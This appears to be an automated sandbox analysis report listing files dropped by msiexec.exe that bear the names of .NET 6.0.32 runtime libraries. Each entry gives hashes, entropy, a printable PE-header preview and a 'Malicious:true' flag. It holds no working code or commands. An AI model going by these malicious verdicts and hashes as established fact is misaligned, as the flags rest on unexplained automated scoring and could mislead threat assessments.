                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....E..........." ................................................................C.....`...@......@............... ..................................8....0...........(......,.......T...........................................................8...H............text...f........................... ..`.data...f...........................@....reloc..,...........................@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21256
                                                                                                                                                                                                                                        Entropy (8bit):6.402835622696235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zgyLzP7uC8sYITet5P9KbxWxutWEcYA6VFHRN7V6mcTR9zi2eiXrkd:zgy7CCKFClcrV9zpeiXrkd
                                                                                                                                                                                                                                        MD5:0F96953D2C97BD849375D7989365F1A9
                                                                                                                                                                                                                                        SHA1:F5CC786D19947FCBBC4FB34D06D8AE2466A2EB08
                                                                                                                                                                                                                                        SHA-256:8FC1D7782F015D6803C640E4F04EEB2B18468D773630B6A0F6FCF09B298FF11B
                                                                                                                                                                                                                                        SHA-512:956E384850295A60C6D838DE285C0ACC31D974F0B451B6CDFCFAFDDE6BDB33613F17E5D30A341A18B8F14A3B5C918D8EC96EAAAF48CF8BB967CC6773F6834DC3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u............." ..0.. ...........>... ...@....... ....................................`.................................}>..O....@..X............*...)...`.......=..T............................................ ............... ..H............text........ ... .................. ..`.rsrc...X....@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P ......................(=......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID.......H...#Blob............T.........3..................................................................m...........#...............d.....x...........W...................................;.....~.[.......................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V...y.V.....V. ...V.....V...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                                        Entropy (8bit):6.685942816560535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wGM51jjMWsXCW/YA6VFHRN7H0KGrYVXC4deR9zVjox78:Y16zFClHbGrYVXC4dC9zVjG78
                                                                                                                                                                                                                                        MD5:8CFBFA7AFD85136DA94F5832D94AC9AE
                                                                                                                                                                                                                                        SHA1:89FEF34116578257A8D700FD83BE859B3199707F
                                                                                                                                                                                                                                        SHA-256:F495B72459FBD399EAFAB35072DD2ADA3466C8B61FF09D5A4F6DC4B46F61F0B2
                                                                                                                                                                                                                                        SHA-512:948D3D1B081026F14C8EA1F21602D0B257B72ADB55B8F7ED5E4165FEB3D081C1380FC88053CED5C95ECFF68EC85ED9506330EC1B88DE44F175E20575606BA78A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............,... ........@.. ....................................`.................................\,..O....@...................)...`.......+..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........ ......................P ........................................e.,..}V...xO.Z...k_.ppb.....8 .6v.?X.......J..*z...:.d.SM....;y..%.t.9...z\z.Ea.R.C....k..]=.S|.....k.g<T..&.@.dS'.BSJB............v4.0.30319......`...P...#~..........#Strings....0.......#GUID...@.......#Blob......................3......................................>.........W...............................Y...9.r...j.r.....r.....r.....r.....r.....r...w.r.....r...........#.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):200352
                                                                                                                                                                                                                                        Entropy (8bit):6.675634999876197
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:cf15GMge2PRUqDcbSjp74Cmwqv9Rcgff3Fu:cfLxgeyRUAcbSjp74Cmw2vFu
                                                                                                                                                                                                                                        MD5:13DF3EE8621AFC18530ED425CED9CD6C
                                                                                                                                                                                                                                        SHA1:BE9C951D0C2159754BA172A680916A628F91EFB6
                                                                                                                                                                                                                                        SHA-256:5AEEE4C52011AF8A5502484C991205985DF529F9F1EE53F9D0EA9FFA53FD13AA
                                                                                                                                                                                                                                        SHA-512:C39E246CA4E4D347F92C82DFE75AF8FA1756A869A08FF97B5116C33A6D0138383D7CCE1C50B9B211E1869CDEA53DAF38BE98838B0FD48C0F956AB7971EBACC75
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...f............." .........(......................................................c.....`...@......@............... ......................................XO...........(........... ..T...............................................................H............text............................... ..`.data...1".......$..................@....reloc..............................@..B............................................0...........................H.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...j.....C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .c.l.a.s.s.e.s. .t.h.a.t. .c.a.n. .r.e.a.d. .a.n.d. .w.r.i.t.e. .t.h.e. .A.S.N...1. .B.E.R.,. .C.E.R.,. .a.n.d. .D.E.R. .d.a.t.a. .f.o.r.m.a.t.s...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                                        Entropy (8bit):6.8006872328458625
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Baq7iRqXWDRq4mRqm0Rq7WWYA6VFHRN7DzPtcTR9zi2e8P:R8qKqbqmuqdFClOV9zpeM
                                                                                                                                                                                                                                        MD5:27C42A08E6C20635141FEC62802D5B95
                                                                                                                                                                                                                                        SHA1:7AE669484842D4D65AE076DDA8B660BE9AB2282A
                                                                                                                                                                                                                                        SHA-256:9896AD79F4528FE1D08E0CB3027127980FA71F8E4F82DE8916BE526157761387
                                                                                                                                                                                                                                        SHA-512:34DBC0056467F5F8218DC0BFB0030D113ECB8F6A9CB27852DB650165BC5FBC2DDF7E88679F273DB09AD3D050799BF348A322EEC0421642C46FEAA2453B0BD9D2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>............."!..0..............+... ........@.. ...............................0....`..................................+..W....@...................)...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ........................................Cx.%*..>...m.......8.e.....Wj..X ....m.wy5.7.s.].dd(!..).....Q..At.I...j*..L.7.9..4I5..l.W....7..*.....q;..M,f....... GBSJB............v4.0.30319......`.......#~......$...#Strings....0.......#GUID...@.......#Blob......................3................................................"...........;...........f.......,.................H...!.H.....H...[.H.....H.....H.....H...B.H...O.H...v.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15624
                                                                                                                                                                                                                                        Entropy (8bit):6.828542855579913
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Dl8RPWYRgpRp0RjWYYA6VFHRN7htZ2R9zEZt:D4NApu7FClDZK9z6t
                                                                                                                                                                                                                                        MD5:E5A6FAA55C56E33AA488D92E489598DD
                                                                                                                                                                                                                                        SHA1:B100EA405A6AA4C5373B6D812F66CC8F53B38B06
                                                                                                                                                                                                                                        SHA-256:D32ACB153BFB96C7BF36049CFA1FCBD89E27EFB53100C8C41D476ACF7D9F17AD
                                                                                                                                                                                                                                        SHA-512:621F24A2695D341BC48746099E41EDBC4143F6F810752551DE85C16F3155484050563751C2F1E55D876C138366B1AFF7A196117D845E6383CF60CF2B5B8777B7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............)... ........@.. ...............................t....`.................................h)..S....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................o..(........>..h.'.......X.B.qy.m.h..u...}.......E..5..p"G._ .wP3L.P.B.*f..1.;.ef.(A9u...........*`h<3.....%..my..f.L....=.BSJB............v4.0.30319......`.......#~..@.......#Strings....$.......#GUID...4.......#Blob......................3..................................................P.....P...3.=...p.....^.....a.......%.....%...w.%.....%.....%...w.%.....%.....%...G.%...I.P.................7.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.72406198525283
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3mQ1AcRLWdRMERA0RHWzYA6VFHRN7FHR9z7t:3mQ1n0xAuMFCl/9zh
                                                                                                                                                                                                                                        MD5:05B81283F6495E06FF0AB4943B2343AE
                                                                                                                                                                                                                                        SHA1:E10D7BF018AE90BA1E53B86CBC808F9CF642C68C
                                                                                                                                                                                                                                        SHA-256:5CD5D885529923A1E4E9680E0C02EC504CF5C9B2375337427B57B20F731CE55D
                                                                                                                                                                                                                                        SHA-512:DB50326EC32CC9FBD3262CE8C004611CDBDCC03D54053FFF0DF0D7B165C13D45F1EFC89749040AA4E01AC4DDE503C26870ADE3D9D1322316849856693245E354
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............."!..0..............+... ........@.. ...............................'....`..................................*..K....@...................(...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..D...................P ......................................."./k....!'e..%..7?.:......-g..nL...^c.b...od%Q...3.L.2N.k...o...mi.....IQ.^.P.4+.n..X.f.C..&..ee3.....f~...;..,..)..Q.QBSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................).........3.K.....K...L.....k.....w.......B.....,.....,.....^...2.^.....^...l.^.....^.....^.....^...S.^...`.^.....K...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):72864
                                                                                                                                                                                                                                        Entropy (8bit):6.524372551005852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:OtCcjcm7Q5dSOyXb23QCQrEp8J0Bi1yz3:Opcm85zyXb236roBeyj
                                                                                                                                                                                                                                        MD5:EC5EE4618509CD0B01447CCF1960DBE8
                                                                                                                                                                                                                                        SHA1:6D84D712271CB213334E1F0ACFE67BE20D41DB09
                                                                                                                                                                                                                                        SHA-256:F90FD1D4986B7ACA57D92A8F069BB4D52CDC9862333099B0403FBA661D6CEFB2
                                                                                                                                                                                                                                        SHA-512:C2A710E0A293BA990FDB7B1139A7B15976D93C4E12B1A14A3C24DC986B136E3AAB2D316F0846EE0FC9E67E7E57C446E7A58152B099797EB3AB9A92E13DFFEBC0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ha..........." ......................................................... ............`...@......@............... ..................................P...D)...........(......l.......T...........................................................P...H............text...D........................... ..`.data...............................@....reloc..l...........................@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                                        Entropy (8bit):6.721333411401923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:OP/3aWu7mW9YA6VFHRN7iYahJpR9zrjNl:OPvOFFCliYa7D9z3r
                                                                                                                                                                                                                                        MD5:6ED07B09003387E0A22CC8E4B7AF99FA
                                                                                                                                                                                                                                        SHA1:22797A9B68088050FCE4C5E11CC05C3EB94F4FA1
                                                                                                                                                                                                                                        SHA-256:0F5559C78DA1B4C5F851DE563E6B7C3411B20E0BC3427940FBCE71F647C7535B
                                                                                                                                                                                                                                        SHA-512:FE9F046FDE19ACF26E16C113FFD20A90B029CF9DF1C4BBEFE45766843AFB61ED8D6BA405DED837510D4D5F9902A10B0D96F8455D41E58CAB7A2614E3A11095CB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`>............" ..0..............*... ...@....... ....................................`.................................9*..O....@...................)...`......@)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................m*......H.......P ..p....................(......................................BSJB............v4.0.30319......l.......#~..t... ...#Strings............#US.........#GUID...........#Blob............T.........3....................................................I...........k...................[...+.....7...................................i...........x...........Q.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):826016
                                                                                                                                                                                                                                        Entropy (8bit):6.111858963772501
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3JhYe83Gfyv7vrkasX8LZ6dA9NWYIAHhlyR8ZXTw05nmZfR83i:PYXv7vr5dx9IAniAmZfRYi
                                                                                                                                                                                                                                        MD5:05ADF6BF8E468B7A9D46E7748FDDAA8A
                                                                                                                                                                                                                                        SHA1:BB527A0E7ADB5BEF8DE1653F4A70B7F78247F792
                                                                                                                                                                                                                                        SHA-256:DBD97753727725C061E6F7258355D54E119098E973A064B8A983273B3B99F787
                                                                                                                                                                                                                                        SHA-512:B2EEA485C1684BC57F8E0E774B8C351C0B6A47C7DC65152BCD31E390B5EA58EC37B8F6CC70C3771F5AAEE6712F24586ACF746E38A5A3D0A0F184C6B7ACDA1A83
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*.ORn.!.n.!.n.!.g...b.!... .m.!.n. ./.!.<.$.q.!.<.%.d.!.<.".f.!...).@.!...!.o.!.....o.!...#.o.!.Richn.!.........PE..d...-.lf.........." ......................................................................`A.........................................V..<...<Y..x.......h....p.......r...(...........&..p...........................0'..8............................................text............................... ..`.rdata..._.......`..................@..@.data...,....`.......H..............@....pdata.......p.......L..............@..@_RDATA...............j..............@..@.rsrc...h............l..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39584
                                                                                                                                                                                                                                        Entropy (8bit):6.504746734753008
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:hWPVIWfgE7XgHg1al2Yd5zDN2147XCIYUvsWIXpuJFH9CEUoGdqtHfSZGU05pu+V:4pwHf41MCUUjgsEUtcRpX5FClUmoQ9zi
                                                                                                                                                                                                                                        MD5:9C86F8E718CBC4CC1E17C865FD81EF29
                                                                                                                                                                                                                                        SHA1:266AD1DF8B2FC2DC483B44C108665420881FB240
                                                                                                                                                                                                                                        SHA-256:B906BA0E3641B75502DD60C4DE71F0CCBF13410E98C6AECF16ED93F6A4285CE3
                                                                                                                                                                                                                                        SHA-512:FA9B0CFC2CC9D04624769E0B5BFA2F6CBFC9C6518F41EA3FA589ABF492A65C6E412953E98B07C0ACF3A697B80F876C90A86B11EEF754F6FC77B2901DE209AE3C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...<4............" .....d...........................................................[....`...@......@............... ..................................P.......4....r...(..............T...........................................................P...H............text....b.......d.................. ..`.data...e............f..............@....reloc...............p..............@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):267016
                                                                                                                                                                                                                                        Entropy (8bit):6.6826444234875275
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:uFkvaNssc18qR3na42neTHhI8HERQu4cI+NWlNRB1xqkUbwn+3GEF7plloN/VhKs:JF/5IeDhInRZWlbB1JI5XllOQuMKHP
                                                                                                                                                                                                                                        MD5:299CE3A886D186D6C6EE21EAD9F9F2F4
                                                                                                                                                                                                                                        SHA1:2C4819070B5B418C78E311DA99352C8ECBA1A580
                                                                                                                                                                                                                                        SHA-256:168DDAB678DE2E1B859B9CD38FBCA6148A3A0DC5DC3590A8D32DFCD94DD67B71
                                                                                                                                                                                                                                        SHA-512:E041719E949FA12E9653F566FAE6446E868CA53E1761F707469D419CDEBE32271251C476A954240A4A805F55E26CEBCCD222D7021C75C1643FFF9A1C3B06C14C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...B%............" .........>...........................................................`...@......@............... .................................. ....k..H........)......0....'..T........................................................... ...H............text...9........................... ..`.data....7.......8..................@....reloc..0...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........(.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93872
                                                                                                                                                                                                                                        Entropy (8bit):6.567261761569019
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:G2BXrcUty70kPhIYeXxs6+gvXYqFBtgvaNB1WXzhZ:G2BXrPwFI1o8NCi14P
                                                                                                                                                                                                                                        MD5:5D63BAFA51DACFBBFB72E18694CA9F6A
                                                                                                                                                                                                                                        SHA1:8B7E54FDDFED77D00A30F9E163BED9CA69D53CDD
                                                                                                                                                                                                                                        SHA-256:6133769F582546A29300BD4988B3CEF06F3C1A83E8F52C2A30C62EC358011EDE
                                                                                                                                                                                                                                        SHA-512:380CCD0BDFDA10F07D5121314208B8924716FCBD1A6C60DF5C536A4C0C70904C653BAFA3B58D1BC05C9B16FFA7FD30A9BEE8460E8DE0852FBFEA86558E645E7E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....C ..........." .....(...................................................p......X.....`...@......@............... ..................................t...T/.......F...(...`......H...T...........................................................x...H............text...w&.......(.................. ..`.data........@.......*..............@....reloc.......`.......B..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42672
                                                                                                                                                                                                                                        Entropy (8bit):6.438920622890288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:hWUHyWx5DVCHWl2Yd5zwNiCXKTmRIYfZKG46JdicX+zu6CVy1/8K/Y5ews+dLFSn:RNf/b36JwcXKLkK/Y71KWQkts89zg
                                                                                                                                                                                                                                        MD5:21B0D8D7603F786BA5FD1396304BE0FA
                                                                                                                                                                                                                                        SHA1:A63565EC1C9979A827960DB4CCD80B62F9EF3F8A
                                                                                                                                                                                                                                        SHA-256:F90B203B1133A025ADCDBB07966C6B6AB78DE1505A9AE582A56481D1EE873F9B
                                                                                                                                                                                                                                        SHA-512:9BB4615E370F449CAB01E8D5DA5A0AED806C3E7083AABF3C014E41ADDBC24A46730174E3EB9A8EAD0BC858B1A9295AFC9FBCB45471269AD9291F21941DB9CC63
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .....p..........................................................8.....`...@......@............... ..................................\............~...(..............T...........................................................`...H............text....n.......p.................. ..`.data...s............r..............@....reloc...............|..............@..B............................................0.......................L.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........d.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...@.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                                        Entropy (8bit):6.830284593719402
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ahYMx9YW/fqW6WKWxNzx95jmHnhWgN7acW4gYCx6RMySX01k9z3AHVKJ8RUJa9J7:an9YW/fqW/ZX6HRN7Hg8MR9zGVKr6V
                                                                                                                                                                                                                                        MD5:BD3CCEA3CAEA8234E219850EE8FD1B56
                                                                                                                                                                                                                                        SHA1:F4A17588CD90E475A521CCA5DAB7374FAB3250A9
                                                                                                                                                                                                                                        SHA-256:C86D4E039FD6BF65D1FA0783193A9ABE30E66C347A43C6163B881D46F3D87EFE
